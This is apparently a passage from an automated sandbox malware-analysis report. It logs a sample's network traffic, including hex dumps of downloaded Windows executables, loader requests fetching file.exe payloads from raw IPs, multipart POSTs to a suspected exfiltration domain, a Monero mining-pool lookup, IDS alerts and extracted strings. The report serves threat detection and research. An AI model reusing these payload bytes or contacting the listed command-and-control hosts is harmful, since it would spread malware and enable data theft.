00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 6e 05 00 00 f0 09 00 00 6e 05 00 00 a2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 6e 05 00 00 60 0f 00 00 6e 05 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 09:18:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 13:30:23 GMTETag: "3daa00-62fac821ad56f"Accept-Ranges: bytesContent-Length: 4041216Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 73 80 a0 e2 12 ee f3 e2 12 ee f3 e2 12 ee f3 a9 6a ed f2 f0 12 ee f3 a9 6a eb f2 7d 12 ee f3 a9 6a ea f2 f4 12 ee f3 f7 6d eb f2 c4 12 ee f3 f7 6d ea f2 f3 12 ee f3 f7 6d ed f2 f7 12 ee f3 a9 6a ef f2 ed 12 ee f3 e2 12 ef f3 6b 12 ee f3 e2 12 ee f3 e3 12 ee f3 c5 d4 83 f3 e3 12 ee f3 d8 92 ea f2 e8 12 ee f3 d8 92 11 f3 e3 12 ee f3 d8 92 ec f2 e3 12 ee f3 52 69 63 68 e2 12 ee f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 18 07 00 00 a2 00 00 00 00 00 00 47 3c 18 00 00 10 00 00 00 30 07 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 40 00 00 04 00 00 62 dc 3d 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 f0 07 00 dc 00 00 00 00 a0 07 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 5c 17 07 00 00 10 00 00 00 1e 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 
20 20 20 20 b4 56 00 00 00 30 07 00 00 28 00 00 00 22 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 1e 0d 00 00 00 90 07 00 00 02 00 00 00 4a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 00 00 00 00 a0 07 00 00 02 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 24 38 00 00 00 b0 07 00 00 1a 00 00 00 4e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 64 61 74 61 00 00 00 10 00 00 00 f0 07 00 00 02 00 00 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 68 65 6d 69 64 61 00 40 38 00 00 00 08 00 00 40 38 00 00 6a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 09:18:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 12 Mar 2025 17:35:05 GMTETag: "15600-63028a03aa5c5"Accept-Ranges: bytesContent-Length: 87552Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d af d5 a9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 48 01 00 00 0c 00 00 00 00 00 00 be 67 01 00 00 20 00 00 00 80 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 67 01 00 57 00 00 00 00 80 01 00 99 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 47 01 00 00 20 00 00 00 48 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 99 08 00 00 00 80 01 00 00 0a 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 01 00 00 02 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 67 01 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 64 00 00 d8 02 01 00 01 00 00 00 36 01 00 06 70 64 00 00 1c 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 02 00 00 00 90 77 53 de 00 00 00 00 49 44 41 54 90 db 7d 47 00 00 00 00 49 45 4e 44 ae 42 60 82 00 00 00 1e 02 28 57 00 00 0a 2a 1b 30 04 00 fa 01 00 00 01 00 00 11 00 02 28 ce 00 00 06 0a 20 d1 08 14 a7 20 0f 1b 98 9d 61 25 13 07 1c 5e 45 06 00 00 00 52 00 00 00 2b 00 00 00 3c 00 00 00 d3 ff ff ff 02 00 00 00 18 00 00 00 2b 50 7e 11 00 00 0a 0b 11 07 20 38 be d9 42 5a 20 00 c5 ce 1a 61 2b c0 06 2c 28 11 07 20 bf 65 c0 c6 5a 20 76 9e e6 dc 61 2b ad 00 11 07 20 eb 3f 61 2e 5a 20 c6 b6 cd b4 61 2b 9c 06 8e 16 fe 03 2b 01 16 0c 08 39 6d 01 00 00 20 c6 aa 61 8e 2b 86 06 28 cf 00 00 06 0d 09 16 28 d0 00 00 06 13 04 11 04 28 d1 00 00 06 13 05 00 20 65 65 48 91 20 0f 1b 98 9d 61 25 13 07 19 5e 45 03 00 00 00 df ff ff ff 1b 00 00 00 02 00 00 00 2b 19 11 05 28 d2 00 00 06 0b 00 11 07 20 fa 57 9f df 5a 20 1f 58 7d c8 61 2b c9 de 54 11 05 2c 4f 20 22 3d 85 e7 20 0f 1b 9
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 09:18:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 12 Mar 2025 17:35:06 GMTETag: "6b200-63028a047c524"Accept-Ranges: bytesContent-Length: 438784Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 28 d4 c9 86 9d e1 22 6b 0a cf d6 90 8e 26 40 db d0 de a5 c8 32 ba 48 42 b5 63 24 1f bc e4 56 92 d8 a1 3c 1a b4 c9 58 58 1f 3e bf 88 be c5 8e b4 c2 f8 85 e7 4c 1b 91 93 a7 16 00 01 00 00 0b 51 d1 00 94 c1 a0 f0 94 9a c9 35 4c f4 a7 89 67 78 cb 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 73 c5 d1 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d ed 88 04 00 04 38 03 00 00 30 00 00 80 e4 03 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 04 00 00 99 fb 06 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 03 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c e4 03 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 d1 03 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 5d 02 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 
00 00 60 00 00 00 00 00 00 00 00 dc e9 00 00 00 70 02 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 cc 21 00 00 00 60 03 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 30 00 00 00 90 03 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 02 00 00 00 00 00 00 00 00 fc 00 00 00 00 c0 03 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 60 2b 02 00 00 d0 03 00 00 2c 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: GET /asdawfq HTTP/1.1Connection: Keep-AliveHost: t.me
                      Source: global trafficHTTP traffic detected: GET /api/or4yk1zqaf HTTP/1.1Host: 185.170.153.104:3000Connection: close
                      Source: global trafficHTTP traffic detected: GET /api/or4yk1zqaf HTTP/1.1Host: 5.252.153.122:3000Connection: close
                      Source: global trafficHTTP traffic detected: GET /loader/29/file.exe HTTP/1.1Host: 138.124.55.36Connection: close
                      Source: global trafficHTTP traffic detected: GET /loader/1/file1.exe HTTP/1.1Host: 138.124.55.36Connection: close
                      Source: global trafficHTTP traffic detected: GET /loader/1/file2.exe HTTP/1.1Host: 138.124.55.36Connection: close
                      Source: global trafficHTTP traffic detected: GET /loader/1/file3.exe HTTP/1.1Host: 138.124.55.36Connection: close
                      Source: Joe Sandbox ViewIP Address: 51.15.58.224 51.15.58.224
                      Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                      Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: SOLTIAES SOLTIAES
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49726 -> 149.154.167.99:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49729 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49740 -> 147.45.124.241:80
                      Source: Network trafficSuricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.4:49740 -> 147.45.124.241:80
                      Source: global trafficHTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: menuedgarli.shop
                      Source: global trafficHTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=mOkelA10FgBwO7FMFJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19635Host: menuedgarli.shop
                      Source: global trafficHTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=S3lZOPEbbUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8747Host: menuedgarli.shop
                      Source: global trafficHTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1S54YTvLWrfzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20415Host: menuedgarli.shop
                      Source: global trafficHTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Cno8wxpy7LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586869Host: menuedgarli.shop
                      Source: global trafficHTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 103Host: menuedgarli.shop
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: global trafficHTTP traffic detected: GET /asdawfq HTTP/1.1Connection: Keep-AliveHost: t.me
                      Source: global trafficHTTP traffic detected: GET /api/or4yk1zqaf HTTP/1.1Host: 185.170.153.104:3000Connection: close
                      Source: global trafficHTTP traffic detected: GET /api/or4yk1zqaf HTTP/1.1Host: 5.252.153.122:3000Connection: close
                      Source: global trafficHTTP traffic detected: GET /loader/29/file.exe HTTP/1.1Host: 138.124.55.36Connection: close
                      Source: global trafficHTTP traffic detected: GET /loader/1/file1.exe HTTP/1.1Host: 138.124.55.36Connection: close
                      Source: global trafficHTTP traffic detected: GET /loader/1/file2.exe HTTP/1.1Host: 138.124.55.36Connection: close
                      Source: global trafficHTTP traffic detected: GET /loader/1/file3.exe HTTP/1.1Host: 138.124.55.36Connection: close
                      Source: global trafficDNS traffic detected: DNS query: t.me
                      Source: global trafficDNS traffic detected: DNS query: menuedgarli.shop
                      Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
                      Source: unknownHTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: menuedgarli.shop
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1712606006.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.0000000001595000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2381772054.0000000001599000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/gsr1.crl0
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1712606006.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.0000000001595000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2381772054.0000000001599000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r4.crl0
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.0000000001595000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2381772054.0000000001599000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/NSADtTurT7Y.crl0
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/Ng
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
                      Source: RtkAudUService64a.exe, 00000040.00000002.2496546660.000001FE48C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.g
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1713028166.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1712606006.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.0000000001595000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2381772054.0000000001599000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crt0-
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1712606006.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.0000000001595000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2381772054.0000000001599000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r4.crt0
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.0000000001595000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2381772054.0000000001599000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/we1.crt0/
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://narwhaljs.org)
